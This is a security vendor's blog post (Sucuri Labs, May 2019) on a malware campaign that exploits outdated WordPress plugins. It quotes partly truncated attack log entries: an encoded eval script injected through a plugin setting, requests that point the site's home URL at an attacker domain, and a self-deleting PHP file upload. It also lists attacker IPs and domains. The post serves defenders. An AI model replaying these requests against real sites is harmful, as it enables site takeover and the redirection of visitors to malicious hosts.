• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Malware Campaign Evolves to Target New Plugins: May 2019

May 28, 2019John Castro

FacebookTwitterSubscribe

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites. Easily automated vulnerabilities are the first choice for bad actors, who typically target different, vulnerable sites during a week period — by rotating malicious domains and injected code, they can improve their chances of avoiding detection.

Plugins Under Attack: May 2019

    WP Live Chat Support
    Ultimate FAQ
    Freemius Library (Multiple plugins are affected)
    WooCommerce Extra Fields
    SupportCandy
    Yellow Pencil Visual Theme Customizer
    Social Warfare
    WordPress GDPR Compliance
    Newspaper and other old tagDiv Themes
    Easy WP SMTP
    WP Total Donations
    Yuzo Related Post

Plugin Payloads Added to the Campaign

WP Live Chat Support

103.211.219.200 - wplc_custom_js=eval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+1...skipped...105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B&wplc_save_settings=1 [21/May/2019] "POST /wp-admin/admin-ajax.php

Ultimate FAQ

51.15.51.186 - home=https%3A%2F%2Fdetectnewfavorite[.]com%2Fpoi%3Fj%3D1%26 [14/May/2019] "POST /wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions 

Freemius Library (Multiple plugins are affected)

51.15.51.186 - - [14/May] "POST /wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=home&option_value=https://detectnewfavorite[.]com/poi?j=1&

WooCommerce Extra Fields

46.105.99.163 - --cf5dc1d9a5f08a640376009baccda0d0\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Anm_personalizedproduct_upload_file\x0D\x0A--cf5dc1d9a5f08a640376009baccda0d0\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0Aupload.php\x0D\x0A--cf5dc1d9a5f08a640376009baccda0d0\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22settings_auto.php\x22\x0D\x0AContent-Type: multipart/form-data\x0D\x0A\x0D\x0A\x0D\x0Askipped...;\x0D\x0A\x0D\x0A@unlink(__FILE__);\x0D\x0A?>\x0D\x0A\x0D\x0A--cf5dc1d9a5f08a640376009baccda0d0--\x0D\x0A [06/May/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1

SupportCandy

46.105.99.163 - - [06/May] "GET /wp-admin/admin-ajax.php?action=wpsc_tickets&setting_action=rb_upload_file HTTP/1.1"

Yellow Pencil Visual Theme Customizer

51.15.51.186 - yp_json_import_data=%5B%7B%22home%22%3A%22aHR0cHM6Ly9kZXRlY3RuZXdmYXZvcml0ZS5jb20vcG9pP2o9MSY%3D%22%7D%5D [14/May] "POST /wp-admin/admin-post.php?yp_remote_get=test HTTP/1.1

Malicious Domains and IPs:

IPs:

    185.238.0.152
    103.211.219.200
    185.212.129.164
    51.15.51.186
    185.212.128.214
    185.238.0.153
    46.105.99.163
    165.227.48.147

Malicious Domains:

    letsmakesomechoice[.]com
    garrygudini[.]com
    blackawardago[.]com
    detectnewfavorite[.]com
    myearthsongs[.]info
    traveltogandi[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, WordPress SecurityTags: Labs Note, Malware, WordPress Plugins and Themes

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.